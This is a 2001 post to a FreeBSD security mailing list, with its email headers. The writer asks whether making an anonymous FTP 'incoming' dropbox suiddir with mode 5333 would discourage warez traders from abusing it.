Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15138.23131.648658.477266@audio.gfoster.com>
Date: Sat, 9 Jun 2001 13:18:19 -0400
To: security@freebsd.org
Subject: Q: suiddir on ~ftp/incoming?
X-Mailer: VM 6.90 under 21.1 (patch 13) "Crater Lake" XEmacs Lucid
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Standard ftpd on a not-so-old 4.3-S. With the less-than-sterling record of
more featureful FTP servers, I'd like to find a way to stick with old
faithful.

Is it a bad idea to make a directory, ~ftp/incoming, with perms=5333, on an
anonymous FTP server as a "dropbox" for uploading? No untrusted shell
accounts on the machine in question.

As most who try to provide drop boxes discover, warez d00dz quickly find
them and manage to fill them up with bit strings that, according to some,
are worth billions of dollars each and every year. They do this by the
mechanism of creating a directory that is owned by "ftp," with which and in
they can play their little games at will.

The intention is, by enforcing suiddir, the directories and files they
create won't be listable, thus removing much of the raison d'etre for their
creation. Of course, the "filler" will still be able to write, fill up the
disk, etc. but the hordes who follow after will be dissuaded and not consume
all your mbufs with their requests.

Anybody done this? Results over time? Yes, it is a form of STO easily
defeated by miscreants keeping a directory of uploaded files and sharing it
with customers. But, in practice, is it worthwhile to do?

Any insight would be appreciated,

Glen Foster